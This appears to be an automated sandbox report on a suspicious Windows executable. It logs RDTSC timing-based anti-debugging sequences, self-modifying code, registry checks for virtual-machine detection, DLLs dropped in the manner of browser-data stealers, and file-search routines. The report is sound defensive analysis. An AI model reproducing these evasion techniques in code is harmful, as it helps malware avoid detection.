Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8417D8 second address: 8417E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnc 00007F0780D1BDB6h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8417E8 second address: 8417F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F07811116D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8417F4 second address: 8417FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8417FA second address: 841810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007F07811116DAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 841810 second address: 84183C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0780D1BDC6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0780D1BDBEh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 841E1F second address: 841E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 841FD0 second address: 841FD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 841FD4 second address: 841FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F07811116DBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84216F second address: 842184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0780D1BDB6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F0780D1BDB6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 842184 second address: 842188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 842188 second address: 84218E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 842E15 second address: 842E40 instructions: 0x00000000 rdtsc 0x00000002 je 00007F07811116D6h 0x00000008 jmp 00007F07811116E7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jnc 00007F07811116D6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84A36D second address: 84A388 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0780D1BDBBh 0x00000007 js 00007F0780D1BDC2h 0x0000000d jc 00007F0780D1BDB6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84FFE6 second address: 850012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F07811116E8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F07811116DEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 850012 second address: 85001E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F0780D1BDB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85001E second address: 850022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 857D8A second address: 857D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 857D96 second address: 857D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 857D9D second address: 857DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 857DA5 second address: 857DA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 857DA9 second address: 857DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85CDEC second address: 85CE03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F07811116DAh 0x00000009 pop ecx 0x0000000a jp 00007F07811116DCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85CE03 second address: 85CE07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85C942 second address: 85C946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 866421 second address: 866433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0780D1BDBCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8750A3 second address: 8750BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07811116E3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87550C second address: 875543 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0780D1BDC7h 0x00000007 jmp 00007F0780D1BDC3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8757C3 second address: 8757C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8757C9 second address: 8757CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8757CD second address: 8757D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 879C2C second address: 879C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 879C34 second address: 879C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 879C40 second address: 879C72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0780D1BDC6h 0x00000007 jnp 00007F0780D1BDB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 jl 00007F0780D1BDB6h 0x00000018 push edx 0x00000019 pop edx 0x0000001a jg 00007F0780D1BDB6h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8838FB second address: 883901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 883901 second address: 88391A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0780D1BDC5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88391A second address: 883924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 883924 second address: 88392E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0780D1BDB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 880E56 second address: 880E62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 880E62 second address: 880E7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 js 00007F0780D1BDB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jbe 00007F0780D1BDB6h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 880E7B second address: 880E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F07811116E0h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 880E94 second address: 880E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 880E9A second address: 880EA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 880EA6 second address: 880EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 880EAC second address: 880EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 880EB0 second address: 880EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 880EB4 second address: 880EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 892754 second address: 89275E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0780D1BDBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 894078 second address: 89407E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 89407E second address: 8940A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 jmp 00007F0780D1BDBDh 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0780D1BDBCh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8940A3 second address: 8940C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07811116E9h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 895F6E second address: 895F8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0780D1BDC6h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 895B96 second address: 895B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A79AA second address: 8A79AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A79AE second address: 8A79B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A6B82 second address: 8A6B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A6B8A second address: 8A6BBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07811116E9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jp 00007F07811116D6h 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jbe 00007F07811116D6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A6BBB second address: 8A6BC1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A6D01 second address: 8A6D0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A6D0E second address: 8A6D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F0780D1BDB6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A6D1B second address: 8A6D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A7139 second address: 8A713F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A713F second address: 8A7143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A7143 second address: 8A7147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A726F second address: 8A7273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A7273 second address: 8A728B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0780D1BDB6h 0x00000008 jl 00007F0780D1BDB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnl 00007F0780D1BDB6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A728B second address: 8A72B5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push ebx 0x00000009 ja 00007F07811116D6h 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 jno 00007F07811116D6h 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jne 00007F07811116D6h 0x00000024 jne 00007F07811116D6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A73E3 second address: 8A741B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0780D1BDC7h 0x00000008 jng 00007F0780D1BDB6h 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 jo 00007F0780D1BDB8h 0x00000019 pushad 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d jl 00007F0780D1BDD4h 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A741B second address: 8A7421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A7421 second address: 8A7427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A756F second address: 8A7578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A9102 second address: 8A910A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A910A second address: 8A9115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A9115 second address: 8A9119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A9119 second address: 8A9130 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F07811116D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F07811116DCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A9130 second address: 8A9149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0780D1BDC5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8ABD87 second address: 8ABDFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07811116E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F07811116E7h 0x0000000f nop 0x00000010 push ebx 0x00000011 and dx, 1193h 0x00000016 pop edx 0x00000017 sub dword ptr [ebp+122D29C3h], eax 0x0000001d push 00000004h 0x0000001f push 00000000h 0x00000021 push eax 0x00000022 call 00007F07811116D8h 0x00000027 pop eax 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c add dword ptr [esp+04h], 00000019h 0x00000034 inc eax 0x00000035 push eax 0x00000036 ret 0x00000037 pop eax 0x00000038 ret 0x00000039 sub dword ptr [ebp+122D2BD7h], eax 0x0000003f mov edx, dword ptr [ebp+122D39E0h] 0x00000045 push A439CD0Ch 0x0000004a push esi 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8AC0D7 second address: 8AC0F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0780D1BDC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8AC0F4 second address: 8AC127 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07811116E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push dword ptr [ebp+122D2461h] 0x00000012 mov edx, 5F0A29FDh 0x00000017 movsx edx, bx 0x0000001a push 08E17A9Bh 0x0000001f push ebx 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8AD981 second address: 8AD985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8AF47F second address: 8AF486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F103F6 second address: 4F10408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0780D1BDBEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F10466 second address: 4F1048C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07811116E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bh, ch 0x0000000f push ebx 0x00000010 pop esi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F1048C second address: 4F104C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0780D1BDC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push esi 0x0000000c mov bx, 54F0h 0x00000010 pop ebx 0x00000011 mov bx, si 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0780D1BDC7h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F10C10 second address: 4F10C24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F07811116E0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F10C24 second address: 4F10C4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0780D1BDBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0780D1BDC5h 0x00000013 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 621C36 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 621BA4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7C5420 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7D842A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 8508DB instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003D4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003D4910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003CDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_003CDA80
